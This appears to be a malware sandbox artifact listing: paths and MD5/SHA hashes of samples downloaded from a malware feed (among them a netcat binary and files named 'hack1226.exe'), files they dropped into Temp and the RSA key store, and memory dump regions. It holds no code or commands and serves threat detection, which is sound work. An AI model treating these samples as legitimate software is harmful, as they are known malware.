SHA1 b6589fc6ab0dc82cf12099d1c2d40ab994e8410c
SHA256 5feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9
SHA512 31bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99

C:\Users\Admin\Downloads\UrlHausFiles\Deccastationers.msi

MD5 5144f4f71644edb5f191e12264318c87
SHA1 09a72b5870726be33efb1bcf6018e3d68872cc6d
SHA256 403f98abad4a3d681466b21dc3e31eb1b37ef8ca34d6f15db675b9260efe0993
SHA512 977f10a82de75fc841040d96e3e343f7607427470aa69d6d5c365d97e34d8595120932eb52a65d48199816c1a16054c0bca2f18e13da8acfe8679d9da4a87e9a

C:\Users\Admin\Downloads\UrlHausFiles\Set_up.exe

MD5 7f44b7e2fdf3d5b7ace267e04a1013ff
SHA1 5f9410958df31fb32db0a8b5c9fa20d73510ce33
SHA256 64ffa88cf0b0129f4ececeb716e5577f65f1572b2cb6a3f4a0f1edc8cf0c3d4f
SHA512 d2f0673a892535c4b397000f60f581effa938fdd4b606cf1bebcef3268416d41a1f235100b07dcae4827f1624e1e79187c2513ca88a5f4a90776af8dbaad89ae

memory/3440-2150-0x00000000028F0000-0x00000000028F5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\G6ZZjPdZ.exe

MD5 46938124a75339a23d09f8c1f0b4bc16
SHA1 27315bb1263acd5efad8826cd6ecf1594860df0c
SHA256 2bf351c527f1ff3aa80d8edafd37b35b91ce5712d35b4002b7f2cef06de02bbd
SHA512 f59d9e977526ac30d8d3746fd96fe8881aec94cea60919d1b088c4163b87219a17945123a14b05846ade9a199b0f5b7f8dda687af3a59bf7de8e324f7ea8a5cb

memory/3440-2204-0x00000000028F0000-0x000000000291B000-memory.dmp

memory/3440-2202-0x00000000028F0000-0x000000000291B000-memory.dmp

memory/3440-2245-0x00000000028F0000-0x0000000002B5D000-memory.dmp

memory/3440-2240-0x00000000028F0000-0x0000000002B5D000-memory.dmp

memory/3440-2247-0x00000000061A0000-0x000000000665A000-memory.dmp

memory/3440-2246-0x00000000061A0000-0x000000000665A000-memory.dmp

C:\Users\Admin\Downloads\UrlHausFiles\ConsoleApp2.exe

MD5 93cb5fda4c13c83445ddb731910a874a
SHA1 694f2533eb20e3abf5c6519cdf0c38a4a04c3213
SHA256 cfc189af73093bb7135c89982343d086e20bc6f482281c17949b3d65a7a005b2
SHA512 7e4da05776e32b977978c2eecd97bd79cefabd3c7df4c5d008ecd8452a5784b730c4c09fe6ef8e66e95c0990135da34184c2fe384f3fd419d45965d61216a676

memory/1492-2265-0x0000000000530000-0x0000000000538000-memory.dmp

C:\Users\Admin\Downloads\UrlHausFiles\1_encoded.exe

MD5 6c098287139a5808d04237dd4cdaec3f
SHA1 aea943805649919983177a66d3d28a5e964da027
SHA256 53932083665adaf933f3d524e1d8399ee4530e03b53d0d39fcbc227041e6a787
SHA512 a9430d0661271f5f988aa14165b945faf4120cc7ed4f751e8f2f4498a7d7c74f03652f45c35035027e112976206054af831d5bd8909377b3947a8a87950afa47

memory/5992-2302-0x0000000140000000-0x00000001400042C8-memory.dmp

C:\Users\Admin\AppData\Local\Temp\9F285E00

MD5 0f4a946fd08a79e0a61ce22fc80dfe19
SHA1 4477e628cd263ebf3b3be229c750ab1f8fc517a6
SHA256 93ab8066c844595117849981822281535790be0962ff50b76f1b82a240447fc2
SHA512 39d317e390c1ffc3d3d4cdf3dc60653450498870e401dbd0949cf69f00360a7e66f19d520cce5c784101713a5a2d05d5a1ec4da44bcb3755d98271550390e7bd

C:\Users\Admin\Downloads\UrlHausFiles\file.exe

MD5 16b50170fda201194a611ca41219be7d
SHA1 2ddda36084918cf436271451b49519a2843f403f
SHA256 a542a2170abf4de0cd79baeb2e8f08deaf6fdeea40e9fc1ec15cbeb988e7900a
SHA512 f07ed33310acc5008cda9dbf3c50e420ad3f76ed11b28b93b2bb32d47ddbb64c97b906babaf6edf2680bea5b6f7456c7986a8610cee30b867d3a07c4430f79e0

memory/1608-2332-0x0000000000050000-0x0000000000062000-memory.dmp

memory/1608-2333-0x0000000000890000-0x0000000000896000-memory.dmp

memory/2092-2373-0x0000024A3E680000-0x0000024A3E6D4000-memory.dmp

C:\Users\Admin\Downloads\UrlHausFiles\bp.exe

MD5 6733c804b5acf9b6746712bafaca17da
SHA1 78a90f5550f9fd0f4e74fea4391614901abb94fc
SHA256 ce68786d9fcb2e0932dbd0cba735690dfd3a505158396ed55fd4bb81b028ace0
SHA512 9e1c72d081b3aaed9f8ec97f7a5ed5e8b828b92ee8fd3e1ebb98834b0ba8008110fca97456354a281afcaed351d5a9625ea4a225394f524070ad028c9f221b41

memory/4120-2391-0x0000000000400000-0x00000000004CE000-memory.dmp

memory/4120-2393-0x0000020F76ED0000-0x0000020F76ED8000-memory.dmp

memory/4276-2394-0x0000000000870000-0x0000000000884000-memory.dmp

memory/4120-2396-0x0000020F77890000-0x0000020F7799A000-memory.dmp

memory/3440-2753-0x00000000028F0000-0x00000000028F5000-memory.dmp

C:\Users\Admin\Downloads\UrlHausFiles\abc.exe

MD5 37fa8c1482b10ddd35ecf5ebe8cb570e
SHA1 7d1d9a99ecc4e834249f2b0774f1a96605b01e50
SHA256 4d2eaca742a1d43705097414144921ae269413efa6a2d978e0dbf8a626da919c
SHA512 a7b7341c4a6c332aef1ffb59d9b6c5e56ec7d6c1cb0eff106c8e03896de3b3729c724a6c64b5bf85af8272bd6cf20d000b7a5433a2871403dd95cca5d96ebd36

memory/3440-3340-0x00000000028F0000-0x000000000291B000-memory.dmp

memory/3440-3336-0x00000000028F0000-0x000000000291B000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2499603254-3415597248-1508446358-1000\0f5007522459c86e95ffcc62f32308f1_8c9ee1bc-5364-4b37-aae7-4f6a9eeffa14

MD5 c07225d4e7d01d31042965f048728a0a
SHA1 69d70b340fd9f44c89adb9a2278df84faa9906b7
SHA256 8c136c7ae08020ad16fd1928e36ad335ddef8b85906d66b712fff049aa57dc9a
SHA512 23d3cea738e1abf561320847c39dadc8b5794d7bd8761b0457956f827a17ad2556118b909a3e6929db79980ccf156a6f58ac823cf88329e62417d2807b34b64b

memory/3440-4656-0x00000000061A0000-0x000000000665A000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2499603254-3415597248-1508446358-1000\0f5007522459c86e95ffcc62f32308f1_8c9ee1bc-5364-4b37-aae7-4f6a9eeffa14

MD5 d898504a722bff1524134c6ab6a5eaa5
SHA1 e0fdc90c2ca2a0219c99d2758e68c18875a3e11e
SHA256 878f32f76b159494f5a39f9321616c6068cdb82e88df89bcc739bbc1ea78e1f9
SHA512 26a4398bffb0c0aef9a6ec53cd3367a2d0abf2f70097f711bbbf1e9e32fd9f1a72121691bb6a39eeb55d596edd527934e541b4defb3b1426b1d1a6429804dc61

C:\Users\Admin\Downloads\UrlHausFiles\ew.exe

MD5 d76e1525c8998795867a17ed33573552
SHA1 daf5b2ffebc86b85e54201100be10fa19f19bf04
SHA256 f4dd44bc19c19056794d29151a5b1bb76afd502388622e24c863a8494af147dd
SHA512 c02e1dcea4dc939bee0ca878792c54ff9be25cf68c0631cba1f15416ab1dabcd16c9bb7ad21af69f940d122b82880b1db79df2264a103463e193f8ae157241dd

C:\Users\Admin\Downloads\UrlHausFiles\PXray_Cast_Sort.exe

MD5 fe517ecfbb94a742e2b88d67785b87bc
SHA1 4d9385b34c2e6021c63b4bed7fbae4bfee12d4d1
SHA256 7617291aba0aa4d54d49f30a344a16513c45ac7f1af79aacf82b3999d876215c
SHA512 b8aae027f92c3708e8ddf815887f7f70d771d340324edfa52551df6f4f2815b8848d00a40de471b0a729c63f0235f74b811e555054518d3ea069b3efc8be2b6a

memory/3440-5338-0x00000000061A0000-0x000000000665A000-memory.dmp

memory/4120-6453-0x0000020F779A0000-0x0000020F779F6000-memory.dmp

C:\Users\Admin\Downloads\UrlHausFiles\AA_v3.5.exe

MD5 5686a7032e37087f0fd082a04f727aad
SHA1 341fee5256dcc259a3a566ca8f0260eb1e60d730
SHA256 43bba98a64dd96cf0571f3d6dceafdc549cc3767a1beab6fe4a6e1fd3ddd3153
SHA512 0ebd95b20ef54d047fdaec37cfb10e2c39ea9d63fa28d6a6848ec11b34a4c4ec5f7a8a430d81670461203b9e675ac4a32cac3da4a1c471f16e8d003c6dea3345

C:\Users\Admin\Downloads\UrlHausFiles\9758xBqgE1azKnB.exe

MD5 bf7866489443a237806a4d3d5701cdf3
SHA1 ffbe2847590e876892b41585784b40144c224160
SHA256 1070bf3c0f917624660bef57d24e6b2cf982dce067e95eb8a041586c0f41a095
SHA512 e9bb9d5157d2011eed5f5013af4145877e3237def266f2cc6fd769ed7065a4fa227f7d316de5fc7eeae8f3f852b685fb3cc166127f79134f1fa1a200b8c0c186

memory/5916-6496-0x00000000005D0000-0x0000000000644000-memory.dmp

memory/3696-6505-0x0000000000400000-0x000000000066D000-memory.dmp

C:\Users\Admin\Downloads\UrlHausFiles\nc64.exe

MD5 523613a7b9dfa398cbd5ebd2dd0f4f38
SHA1 3e92f697d642d68bb766cc93e3130b36b2da2bab
SHA256 3e59379f585ebf0becb6b4e06d0fbbf806de28a4bb256e837b4555f1b4245571
SHA512 2ca42e21ebc26233c3822851d9fc82f950186820e10d3601c92b648415eb720f0e1a3a6d9d296497a3393a939a9424c47b1e5eaedfd864f96e3ab8986f6b35b5

C:\Users\Admin\Downloads\UrlHausFiles\xblkpfZ8Y4.exe

MD5 45fe36d03ea2a066f6dd061c0f11f829
SHA1 6e45a340c41c62cd51c5e6f3b024a73c7ac85f88
SHA256 832640671878e0d9a061d97288ffaae303ba3b4858ed5d675c2170e7770ec8a6
SHA512 c8676bd022fae62a2c03932dd874da8482168698fc99987c8d724b5302f75131839b5b3b6f8288b823c5bb732918f6bc49c377116bb78825807de45b6a10026f

memory/6592-6521-0x00007FF6AF820000-0x00007FF6B0470000-memory.dmp

C:\Users\Admin\Downloads\UrlHausFiles\hack1226.exe

MD5 d259a1c0c84bbeefb84d11146bd0ebe5
SHA1 feaceced744a743145af4709c0fccf08ed0130a0
SHA256 8de12184a006d3340241492baca0ba1034182b08d3c6a0f09c0af99d539bd48b
SHA512 84944d132fb47be7d22e55456bc1c4bbb93ce281b775e57641a012602f77219c6a9c75ed67ca1fbec1ee15550dee58b9a8adeacbe136e58d2ed1f4c6b755fd54

memory/2012-6535-0x0000000000400000-0x000000000041F000-memory.dmp